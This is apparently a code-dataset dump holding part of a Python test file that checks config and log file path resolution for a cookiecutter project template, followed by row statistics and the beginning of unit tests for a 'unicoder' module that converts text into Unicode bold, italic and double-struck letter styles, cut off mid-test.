"/etc/{{cookiecutter.project_slug}}/production.yml", "/etc/{{cookiecutter.project_slug}}/app.yaml", "/etc/{{cookiecutter.project_slug}}/app.yml", os.path.join(cfg.XDG_CONFIG_HOME, "production.yaml"), os.path.join(cfg.XDG_CONFIG_HOME, "production.yml"), os.path.join(cfg.XDG_CONFIG_HOME, "app.yaml"), os.path.join(cfg.XDG_CONFIG_HOME, "app.yml"), ] assert cfg.filelog_abspath == os.path.join(cfg.XDG_DATA_HOME, "production.log") assert cfg.logging_config_abspaths == [ "/etc/{{cookiecutter.project_slug}}/logging_config.json", os.path.join(cfg.XDG_CONFIG_HOME, "logging_config.json"), ] cfg._IS_RUNNING_FROM_SOURCE = False cfg._logging_json = {"handlers": {"file": {"filename": None}}} assert cfg.config_file_abspaths == [ "/etc/{{cookiecutter.project_slug}}/production.yaml", "/etc/{{cookiecutter.project_slug}}/production.yml", "/etc/{{cookiecutter.project_slug}}/app.yaml", "/etc/{{cookiecutter.project_slug}}/app.yml", os.path.join(cfg.XDG_CONFIG_HOME, "production.yaml"), os.path.join(cfg.XDG_CONFIG_HOME, "production.yml"), os.path.join(cfg.XDG_CONFIG_HOME, "app.yaml"), os.path.join(cfg.XDG_CONFIG_HOME, "app.yml"), ] assert cfg.filelog_abspath == os.path.join(cfg.XDG_DATA_HOME, "production.log") assert cfg.logging_config_abspaths == [ "/etc/{{cookiecutter.project_slug}}/logging_config.json", os.path.join(cfg.XDG_CONFIG_HOME, "logging_config.json"), ] def it_resolves_to_correct_config_paths_when_relative_override_given(self, mocker): cmdline_args = mocker.Mock() cmdline_args.config_file_path = "relative/path/config_file.yaml" cmdline_args.log_file_path = "relative/path/log_file.log" cmdline_args.logging_config_path = "relative/path/logging_config.json" cfg = ENVIRONMENTS["production"](cmdline_args) # Prevent logging config from loading cfg._logging_json = {"handlers": {"file": {"filename": None}}} cfg._IS_RUNNING_FROM_SOURCE = True assert cfg.config_file_abspaths == [ os.path.join(cfg._REPO_ROOT, cmdline_args.config_file_path) ] assert cfg.filelog_abspath == os.path.join( cfg._REPO_ROOT, cmdline_args.log_file_path ) assert cfg.logging_config_abspaths == [ os.path.join(cfg._REPO_ROOT, cmdline_args.logging_config_path) ] cfg._IS_RUNNING_FROM_SOURCE = False cfg._logging_json = {"handlers": {"file": {"filename": None}}} assert cfg.config_file_abspaths == [ os.path.join(cfg.XDG_CONFIG_HOME, cmdline_args.config_file_path) ] assert cfg.filelog_abspath == os.path.join( cfg.XDG_DATA_HOME, cmdline_args.log_file_path ) assert cfg.logging_config_abspaths == [ os.path.join(cfg.XDG_CONFIG_HOME, cmdline_args.logging_config_path) ] cfg = ENVIRONMENTS["production"]() cfg._IS_RUNNING_FROM_SOURCE = True cfg._logging_json = {"handlers": {"file": {"filename": "foo/bar.json"}}} assert cfg.filelog_abspath == os.path.join(cfg._REPO_ROOT, "foo/bar.json") cfg._IS_RUNNING_FROM_SOURCE = False cfg._logging_json = {"handlers": {"file": {"filename": "foo/bar.json"}}} assert cfg.filelog_abspath == os.path.join(cfg.XDG_DATA_HOME, "foo/bar.json") def it_resolves_to_correct_config_paths_when_absolute_override_given(self, mocker): cmdline_args = mocker.Mock() cmdline_args.config_file_path = "/absolute/path/config_file.yaml" cmdline_args.log_file_path = "/absolute/path/log_file.log" cmdline_args.logging_config_path = "/absolute/path/logging_config.json" cfg = ENVIRONMENTS["production"](cmdline_args) # Prevent logging config from loading cfg._logging_json = {"handlers": {"file": {"filename": None}}} cfg._IS_RUNNING_FROM_SOURCE = True assert cfg.config_file_abspaths == [cmdline_args.config_file_path] assert cfg.filelog_abspath == cmdline_args.log_file_path assert cfg.logging_config_abspaths == [cmdline_args.logging_config_path] cfg._IS_RUNNING_FROM_SOURCE = False cfg._logging_json = {"handlers": {"file": {"filename": None}}} assert cfg.config_file_abspaths == [cmdline_args.config_file_path] assert cfg.filelog_abspath == cmdline_args.log_file_path assert cfg.logging_config_abspaths == [cmdline_args.logging_config_path] cfg = ENVIRONMENTS["production"]() cfg._IS_RUNNING_FROM_SOURCE = True cfg._logging_json = {"handlers": {"file": {"filename": "/foo/bar.json"}}} assert cfg.filelog_abspath == os.path.join("/foo/bar.json") cfg._IS_RUNNING_FROM_SOURCE = False cfg._logging_json = {"handlers": {"file": {"filename": "/foo/bar.json"}}} assert cfg.filelog_abspath == os.path.join("/foo/bar.json") def it_loads_bundled_loging_config_if_no_external_files_exist(self, mocker): mocker.patch.object( ENVIRONMENTS["production"], "logging_config_abspaths", new_callable=mocker.PropertyMock, return_value=["/foo"], ) cfg = ENVIRONMENTS["production"]() with open( resource_filename( Requirement("{{cookiecutter.project_slug}}"), "{{cookiecutter.project_slug}}/resources/logging_config.json", ), "r", ) as f: expected = json.load(f) assert cfg.logging_config_abspaths == ["/foo"] cfg._load_logging_config() assert cfg._logging_json == expected
44.469453
119
0.663702
1,575
13,830
5.475556
0.064762
0.088938
0.034787
0.042208
0.927296
0.922542
0.922542
0.915584
0.911874
0.882653
0
0
0.223933
13,830
310
120
44.612903
0.803503
0.023355
0
0.694444
0
0
0.17878
0.108839
0
0
0
0
0.198413
0
null
null
0
0.019841
null
null
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
7
1fdfbc03828e86ecd6308d16f2e9bdb61fdf10d3
64,439
py
Python
unicoder.py.tests.py
gdraheim/unicoder
4e8a89d1fd14ae2e88090d719cb05cfb81a0e851
[ "Apache-2.0" ]
null
null
null
unicoder.py.tests.py
gdraheim/unicoder
4e8a89d1fd14ae2e88090d719cb05cfb81a0e851
[ "Apache-2.0" ]
null
null
null
unicoder.py.tests.py
gdraheim/unicoder
4e8a89d1fd14ae2e88090d719cb05cfb81a0e851
[ "Apache-2.0" ]
null
null
null
#! /usr/bin/python3 """ testing the unicoder.py functions """ import sys, os import unittest import logging from fnmatch import fnmatchcase as fnmatch import unicoder logg = logging.getLogger("TEST") base_abcdefghijklmnopqrstuvwxyz = ":abcdefghijklmnopqrstuvwxyz" base_ABCDEFGHIJKLMNOPQRSTUVWXYZ = ":ABCDEFGHIJKLMNOPQRSTUVWXYZ" mono_abcdefghijklmnopqrstuvwxyz = ":𝚊𝚋𝚌𝚍𝚎𝚏𝚐𝚑𝚒𝚓𝚔𝚕𝚖𝚗𝚘𝚙𝚚𝚛𝚜𝚝𝚞𝚟𝚠𝚡𝚢𝚣" mono_ABCDEFGHIJKLMNOPQRSTUVWXYZ = ":𝙰𝙱𝙲𝙳𝙴𝙵𝙶𝙷𝙸𝙹𝙺𝙻𝙼𝙽𝙾𝙿𝚀𝚁𝚂𝚃𝚄𝚅𝚆𝚇𝚈𝚉" sans_abcdefghijklmnopqrstuvwxyz = ":𝖺𝖻𝖼𝖽𝖾𝖿𝗀𝗁𝗂𝗃𝗄𝗅𝗆𝗇𝗈𝗉𝗊𝗋𝗌𝗍𝗎𝗏𝗐𝗑𝗒𝗓" sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ = ":𝖠𝖡𝖢𝖣𝖤𝖥𝖦𝖧𝖨𝖩𝖪𝖫𝖬𝖭𝖮𝖯𝖰𝖱𝖲𝖳𝖴𝖵𝖶𝖷𝖸𝖹" base_0123456789 = ":0123456789" mono_0123456789 = ":𝟶𝟷𝟸𝟹𝟺𝟻𝟼𝟽𝟾𝟿" sans_0123456789 = ":𝟢𝟣𝟤𝟥𝟦𝟧𝟨𝟩𝟪𝟫" bold_sans_abcdefghijklmnopqrstuvwxyz = ":𝗮𝗯𝗰𝗱𝗲𝗳𝗴𝗵𝗶𝗷𝗸𝗹𝗺𝗻𝗼𝗽𝗾𝗿𝘀𝘁𝘂𝘃𝘄𝘅𝘆𝘇" bold_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ = ":𝗔𝗕𝗖𝗗𝗘𝗙𝗚𝗛𝗜𝗝𝗞𝗟𝗠𝗡𝗢𝗣𝗤𝗥𝗦𝗧𝗨𝗩𝗪𝗫𝗬𝗭" bold_sans_0123456789 = ":𝟬𝟭𝟮𝟯𝟰𝟱𝟲𝟳𝟴𝟵" ital_sans_abcdefghijklmnopqrstuvwxyz = ":𝘢𝘣𝘤𝘥𝘦𝘧𝘨𝘩𝘪𝘫𝘬𝘭𝘮𝘯𝘰𝘱𝘲𝘳𝘴𝘵𝘶𝘷𝘸𝘹𝘺𝘻" ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ = ":𝘈𝘉𝘊𝘋𝘌𝘍𝘎𝘏𝘐𝘑𝘒𝘓𝘔𝘕𝘖𝘗𝘘𝘙𝘚𝘛𝘜𝘝𝘞𝘟𝘠𝘡" ital_sans_0123456789 = ":𝟢𝟣𝟤𝟥𝟦𝟧𝟨𝟩𝟪𝟫" # aka sans bold_ital_sans_abcdefghijklmnopqrstuvwxyz = ":𝙖𝙗𝙘𝙙𝙚𝙛𝙜𝙝𝙞𝙟𝙠𝙡𝙢𝙣𝙤𝙥𝙦𝙧𝙨𝙩𝙪𝙫𝙬𝙭𝙮𝙯" bold_ital_sans_ABCDEFGHIJKLMNOPQRSTUVWXYZ = ":𝘼𝘽𝘾𝘿𝙀𝙁𝙂𝙃𝙄𝙅𝙆𝙇𝙈𝙉𝙊𝙋𝙌𝙍𝙎𝙏𝙐𝙑𝙒𝙓𝙔𝙕" bold_ital_sans_0123456789 = ":𝟬𝟭𝟮𝟯𝟰𝟱𝟲𝟳𝟴𝟵" # aka bold_sans class UnicoderTest(unittest.TestCase): def test_001_opt_scan(self) -> None: opt = unicoder.scan(["-v"]) self.assertEqual(opt.verbose, 1) def test_002_opt_scan(self) -> None: opt = unicoder.scan(["-vv"]) self.assertEqual(opt.verbose, 2) def test_003_opt_scan(self) -> None: opt = unicoder.scan(["-v", "-vv"]) self.assertEqual(opt.verbose, 3) def test_005_opt_scan(self) -> None: opt = unicoder.scan(["--verbose"]) self.assertEqual(opt.verbose, 1) def test_006_opt_scan(self) -> None: opt = unicoder.scan(["--verbose", "--verbose"]) self.assertEqual(opt.verbose, 2) def test_007_opt_scan(self) -> None: opt = unicoder.scan(["--verbose", "--verbose", "-vv"]) self.assertEqual(opt.verbose, 4) def test_008_opt_scan(self) -> None: opt = unicoder.scan(["--verbose", "-vv", "--verbose"]) self.assertEqual(opt.verbose, 4) def test_009_opt_scan(self) -> None: opt = unicoder.scan(["-vv", "--verbose", "--verbose"]) self.assertEqual(opt.verbose, 4) def test_011_opt_scan(self) -> None: opt = unicoder.scan(["-h"]) self.assertEqual(opt.helpinfo, 1) def test_012_opt_scan(self) -> None: opt = unicoder.scan(["-hh"]) self.assertEqual(opt.helpinfo, 2) def test_013_opt_scan(self) -> None: opt = unicoder.scan(["-hh", "--help"]) self.assertEqual(opt.helpinfo, 3) def test_014_opt_scan(self) -> None: opt = unicoder.scan(["-hh", "--help", "arg1"]) self.assertEqual(opt.helpinfo, 3) self.assertEqual(opt.cmd, "arg1") self.assertEqual(opt.text, "") def test_015_opt_scan(self) -> None: opt = unicoder.scan(["-hh", "--help", "arg1", "arg2"]) self.assertEqual(opt.helpinfo, 3) self.assertEqual(opt.cmd, "arg1") self.assertEqual(opt.text, "arg2") def test_016_opt_scan(self) -> None: opt = unicoder.scan(["-hh", "--help", "arg1", "arg2", "--arg3"]) self.assertEqual(opt.helpinfo, 3) self.assertEqual(opt.cmd, "arg1") self.assertEqual(opt.text, "arg2 --arg3") def test_017_opt_scan(self) -> None: opt = unicoder.scan(["-hh", "--help", "arg1", "--arg2", "arg3"]) self.assertEqual(opt.helpinfo, 3) self.assertEqual(opt.cmd, "arg1") self.assertEqual(opt.text, "--arg2 arg3") def test_018_opt_scan(self) -> None: opt = unicoder.scan(["-hh", "--help", "--arg1", "arg2", "arg3"]) self.assertEqual(opt.helpinfo, 3) self.assertEqual(opt.cmd, "arg2") self.assertEqual(opt.text, "arg3") def test_019_opt_scan(self) -> None: opt = unicoder.scan(["-hh", "--help", "-&", "arg2", "arg3"]) self.assertEqual(opt.helpinfo, 3) self.assertEqual(opt.cmd, "arg2") self.assertEqual(opt.text, "arg3") def test_051_helpinfo(self) -> None: text = unicoder.helpinfo() self.assertIn("futark", text) self.assertIn("italboldgreek", text) # def test_110_bold_base(self) -> None: uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz) def test_111_bold_base(self) -> None: uni = unicoder.convert("fat", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝐚𝐛𝐜𝐝𝐞𝐟𝐠𝐡𝐢𝐣𝐤𝐥𝐦𝐧𝐨𝐩𝐪𝐫𝐬𝐭𝐮𝐯𝐰𝐱𝐲𝐳") def test_112_bold_base(self) -> None: uni = unicoder.convert("bold", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝐚𝐛𝐜𝐝𝐞𝐟𝐠𝐡𝐢𝐣𝐤𝐥𝐦𝐧𝐨𝐩𝐪𝐫𝐬𝐭𝐮𝐯𝐰𝐱𝐲𝐳") def test_113_bold_base(self) -> None: uni = unicoder.convert("fat", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝐀𝐁𝐂𝐃𝐄𝐅𝐆𝐇𝐈𝐉𝐊𝐋𝐌𝐍𝐎𝐏𝐐𝐑𝐒𝐓𝐔𝐕𝐖𝐗𝐘𝐙") def test_114_bold_base(self) -> None: uni = unicoder.convert("bold", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝐀𝐁𝐂𝐃𝐄𝐅𝐆𝐇𝐈𝐉𝐊𝐋𝐌𝐍𝐎𝐏𝐐𝐑𝐒𝐓𝐔𝐕𝐖𝐗𝐘𝐙") def test_115_bold_base(self) -> None: uni = unicoder.bold(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝐚𝐛𝐜𝐝𝐞𝐟𝐠𝐡𝐢𝐣𝐤𝐥𝐦𝐧𝐨𝐩𝐪𝐫𝐬𝐭𝐮𝐯𝐰𝐱𝐲𝐳") def test_116_bold_base(self) -> None: uni = unicoder.bold(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝐚𝐛𝐜𝐝𝐞𝐟𝐠𝐡𝐢𝐣𝐤𝐥𝐦𝐧𝐨𝐩𝐪𝐫𝐬𝐭𝐮𝐯𝐰𝐱𝐲𝐳") def test_117_bold_base(self) -> None: uni = unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝐀𝐁𝐂𝐃𝐄𝐅𝐆𝐇𝐈𝐉𝐊𝐋𝐌𝐍𝐎𝐏𝐐𝐑𝐒𝐓𝐔𝐕𝐖𝐗𝐘𝐙") def test_118_bold_base(self) -> None: uni = unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝐀𝐁𝐂𝐃𝐄𝐅𝐆𝐇𝐈𝐉𝐊𝐋𝐌𝐍𝐎𝐏𝐐𝐑𝐒𝐓𝐔𝐕𝐖𝐗𝐘𝐙") def test_120_ital_base(self) -> None: uni = unicoder.convert("fix", ":abcdefg-ijklmnopqrstuvwxyz") self.assertEqual(uni, ":abcdefg-ijklmnopqrstuvwxyz") uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":abcdefghijklmnopqrstuvwxyz") def test_121_ital_base(self) -> None: uni = unicoder.convert("slant", ":abcdefg-ijklmnopqrstuvwxyz") self.assertEqual(uni, ":𝑎𝑏𝑐𝑑𝑒𝑓𝑔-𝑖𝑗𝑘𝑙𝑚𝑛𝑜𝑝𝑞𝑟𝑠𝑡𝑢𝑣𝑤𝑥𝑦𝑧") uni = unicoder.convert("slant", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝑎𝑏𝑐𝑑𝑒𝑓𝑔ℎ𝑖𝑗𝑘𝑙𝑚𝑛𝑜𝑝𝑞𝑟𝑠𝑡𝑢𝑣𝑤𝑥𝑦𝑧") def test_122_ital_base(self) -> None: uni = unicoder.convert("ital", ":abcdefg-ijklmnopqrstuvwxyz") self.assertEqual(uni, ":𝑎𝑏𝑐𝑑𝑒𝑓𝑔-𝑖𝑗𝑘𝑙𝑚𝑛𝑜𝑝𝑞𝑟𝑠𝑡𝑢𝑣𝑤𝑥𝑦𝑧") uni = unicoder.convert("ital", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝑎𝑏𝑐𝑑𝑒𝑓𝑔ℎ𝑖𝑗𝑘𝑙𝑚𝑛𝑜𝑝𝑞𝑟𝑠𝑡𝑢𝑣𝑤𝑥𝑦𝑧") def test_123_ital_base(self) -> None: uni = unicoder.convert("slant", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝐴𝐵𝐶𝐷𝐸𝐹𝐺𝐻𝐼𝐽𝐾𝐿𝑀𝑁𝑂𝑃𝑄𝑅𝑆𝑇𝑈𝑉𝑊𝑋𝑌𝑍") def test_124_ital_base(self) -> None: uni = unicoder.convert("ital", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝐴𝐵𝐶𝐷𝐸𝐹𝐺𝐻𝐼𝐽𝐾𝐿𝑀𝑁𝑂𝑃𝑄𝑅𝑆𝑇𝑈𝑉𝑊𝑋𝑌𝑍") def test_125_ital_base(self) -> None: uni = unicoder.ital(":abcdefg-ijklmnopqrstuvwxyz") self.assertEqual(uni, ":𝑎𝑏𝑐𝑑𝑒𝑓𝑔-𝑖𝑗𝑘𝑙𝑚𝑛𝑜𝑝𝑞𝑟𝑠𝑡𝑢𝑣𝑤𝑥𝑦𝑧") uni = unicoder.ital(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝑎𝑏𝑐𝑑𝑒𝑓𝑔ℎ𝑖𝑗𝑘𝑙𝑚𝑛𝑜𝑝𝑞𝑟𝑠𝑡𝑢𝑣𝑤𝑥𝑦𝑧") def test_126_ital_base(self) -> None: uni = unicoder.ital(":abcdefg-ijklmnopqrstuvwxyz") self.assertEqual(uni, ":𝑎𝑏𝑐𝑑𝑒𝑓𝑔-𝑖𝑗𝑘𝑙𝑚𝑛𝑜𝑝𝑞𝑟𝑠𝑡𝑢𝑣𝑤𝑥𝑦𝑧") uni = unicoder.ital(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝑎𝑏𝑐𝑑𝑒𝑓𝑔ℎ𝑖𝑗𝑘𝑙𝑚𝑛𝑜𝑝𝑞𝑟𝑠𝑡𝑢𝑣𝑤𝑥𝑦𝑧") def test_127_ital_base(self) -> None: uni = unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝐴𝐵𝐶𝐷𝐸𝐹𝐺𝐻𝐼𝐽𝐾𝐿𝑀𝑁𝑂𝑃𝑄𝑅𝑆𝑇𝑈𝑉𝑊𝑋𝑌𝑍") def test_128_ital_base(self) -> None: uni = unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝐴𝐵𝐶𝐷𝐸𝐹𝐺𝐻𝐼𝐽𝐾𝐿𝑀𝑁𝑂𝑃𝑄𝑅𝑆𝑇𝑈𝑉𝑊𝑋𝑌𝑍") def test_130_bold_ital_base(self) -> None: uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz) def test_131_ital_bold_base(self) -> None: uni = unicoder.convert("fatslant", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛") def test_132_ital_bold_base(self) -> None: uni = unicoder.convert("italbold", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛") def test_133_ital_bold_base(self) -> None: uni = unicoder.convert("fatslant", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝑨𝑩𝑪𝑫𝑬𝑭𝑮𝑯𝑰𝑱𝑲𝑳𝑴𝑵𝑶𝑷𝑸𝑹𝑺𝑻𝑼𝑽𝑾𝑿𝒀𝒁") def test_134_ital_bold_base(self) -> None: uni = unicoder.convert("italbold", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝑨𝑩𝑪𝑫𝑬𝑭𝑮𝑯𝑰𝑱𝑲𝑳𝑴𝑵𝑶𝑷𝑸𝑹𝑺𝑻𝑼𝑽𝑾𝑿𝒀𝒁") def test_136_ital_bold_base(self) -> None: uni = unicoder.ital(unicoder.bold(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, ":𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛") def test_137_ital_bold_base(self) -> None: uni = unicoder.ital(unicoder.bold(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, ":𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛") def test_138_ital_bold_base(self) -> None: uni = unicoder.ital(unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ":𝑨𝑩𝑪𝑫𝑬𝑭𝑮𝑯𝑰𝑱𝑲𝑳𝑴𝑵𝑶𝑷𝑸𝑹𝑺𝑻𝑼𝑽𝑾𝑿𝒀𝒁") def test_139_ital_bold_base(self) -> None: uni = unicoder.ital(unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ":𝑨𝑩𝑪𝑫𝑬𝑭𝑮𝑯𝑰𝑱𝑲𝑳𝑴𝑵𝑶𝑷𝑸𝑹𝑺𝑻𝑼𝑽𝑾𝑿𝒀𝒁") def test_140_bold_ital_base(self) -> None: uni = unicoder.bold(unicoder.ital(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, ":𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛") def test_141_bold_ital_base(self) -> None: uni = unicoder.bold(unicoder.ital(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, ":𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛") def test_142_bold_ital_base(self) -> None: uni = unicoder.bold(unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ":𝑨𝑩𝑪𝑫𝑬𝑭𝑮𝑯𝑰𝑱𝑲𝑳𝑴𝑵𝑶𝑷𝑸𝑹𝑺𝑻𝑼𝑽𝑾𝑿𝒀𝒁") def test_143_bold_ital_base(self) -> None: uni = unicoder.bold(unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ":𝑨𝑩𝑪𝑫𝑬𝑭𝑮𝑯𝑰𝑱𝑲𝑳𝑴𝑵𝑶𝑷𝑸𝑹𝑺𝑻𝑼𝑽𝑾𝑿𝒀𝒁") def test_150_bold_numm(self) -> None: uni = unicoder.convert("fix", base_0123456789) self.assertEqual(uni, base_0123456789) def test_151_bold_numm(self) -> None: uni = unicoder.convert("fat", base_0123456789) self.assertEqual(uni, ":𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗") def test_152_bold_numm(self) -> None: uni = unicoder.convert("bold", base_0123456789) self.assertEqual(uni, ":𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗") def test_155_bold_numm(self) -> None: uni = unicoder.bold(base_0123456789) self.assertEqual(uni, ":𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗") def test_156_bold_numm(self) -> None: uni = unicoder.bold(base_0123456789) self.assertEqual(uni, ":𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗") def test_160_ital_numm(self) -> None: uni = unicoder.convert("fix", base_0123456789) self.assertEqual(uni, base_0123456789) def test_161_ital_numm(self) -> None: uni = unicoder.convert("slant", base_0123456789) self.assertEqual(uni, base_0123456789) def test_162_ital_numm(self) -> None: uni = unicoder.convert("ital", base_0123456789) self.assertEqual(uni, base_0123456789) def test_170_bold_base_sz(self) -> None: uni = unicoder.convert("fix", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":abcxyzABCXYZ0123456789ß") def test_171_bold_base_sz(self) -> None: uni = unicoder.convert("fat", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":𝐚𝐛𝐜𝐱𝐲𝐳𝐀𝐁𝐂𝐗𝐘𝐙𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗𝛃") def test_172_bold_base_sz(self) -> None: uni = unicoder.convert("bold", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":𝐚𝐛𝐜𝐱𝐲𝐳𝐀𝐁𝐂𝐗𝐘𝐙𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗𝛃") def test_180_ital_base_sz(self) -> None: uni = unicoder.convert("fix", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":abcxyzABCXYZ0123456789ß") def test_181_ital_base_sz(self) -> None: uni = unicoder.convert("slant", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":𝑎𝑏𝑐𝑥𝑦𝑧𝐴𝐵𝐶𝑋𝑌𝑍0123456789𝛽") def test_182_ital_base_sz(self) -> None: uni = unicoder.convert("ital", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":𝑎𝑏𝑐𝑥𝑦𝑧𝐴𝐵𝐶𝑋𝑌𝑍0123456789𝛽") def test_190_bold_ital_base_sz(self) -> None: uni = unicoder.convert("fix", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":abcxyzABCXYZ0123456789ß") def test_191_bold_ital_base_sz(self) -> None: uni = unicoder.convert("fatslant", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":𝒂𝒃𝒄𝒙𝒚𝒛𝑨𝑩𝑪𝑿𝒀𝒁𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗𝜷") def test_192_bold_ital_base_sz(self) -> None: uni = unicoder.convert("italbold", ":abcxyzABCXYZ0123456789ß") self.assertEqual(uni, ":𝒂𝒃𝒄𝒙𝒚𝒛𝑨𝑩𝑪𝑿𝒀𝒁𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗𝜷") # def test_200_norm_double(self) -> None: uni = unicoder.convert("fix", ":abcxyzABCXYZ") self.assertEqual(uni, ":abcxyzABCXYZ") def test_201_norm_double(self) -> None: uni = unicoder.convert("double", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝕒𝕓𝕔𝕕𝕖𝕗𝕘𝕙𝕚𝕛𝕜𝕝𝕞𝕟𝕠𝕡𝕢𝕣𝕤𝕥𝕦𝕧𝕨𝕩𝕪𝕫") def test_202_norm_double(self) -> None: uni = unicoder.convert("wide", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝕒𝕓𝕔𝕕𝕖𝕗𝕘𝕙𝕚𝕛𝕜𝕝𝕞𝕟𝕠𝕡𝕢𝕣𝕤𝕥𝕦𝕧𝕨𝕩𝕪𝕫") def test_203_norm_double(self) -> None: uni = unicoder.convert("double", ":AB-DEFG-IJKLM-O---STUVWXY-") self.assertEqual(uni, ":𝔸𝔹-𝔻𝔼𝔽𝔾-𝕀𝕁𝕂𝕃𝕄-𝕆---𝕊𝕋𝕌𝕍𝕎𝕏𝕐-") uni = unicoder.convert("double", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝔸𝔹ℂ𝔻𝔼𝔽𝔾ℍ𝕀𝕁𝕂𝕃𝕄ℕ𝕆ℙℚℝ𝕊𝕋𝕌𝕍𝕎𝕏𝕐ℤ") def test_204_norm_double(self) -> None: uni = unicoder.convert("wide", ":AB-DEFG-IJKLM-O---STUVWXY-") self.assertEqual(uni, ":𝔸𝔹-𝔻𝔼𝔽𝔾-𝕀𝕁𝕂𝕃𝕄-𝕆---𝕊𝕋𝕌𝕍𝕎𝕏𝕐-") uni = unicoder.convert("wide", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝔸𝔹ℂ𝔻𝔼𝔽𝔾ℍ𝕀𝕁𝕂𝕃𝕄ℕ𝕆ℙℚℝ𝕊𝕋𝕌𝕍𝕎𝕏𝕐ℤ") def test_205_norm_double(self) -> None: uni = unicoder.double(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝕒𝕓𝕔𝕕𝕖𝕗𝕘𝕙𝕚𝕛𝕜𝕝𝕞𝕟𝕠𝕡𝕢𝕣𝕤𝕥𝕦𝕧𝕨𝕩𝕪𝕫") def test_206_norm_double(self) -> None: uni = 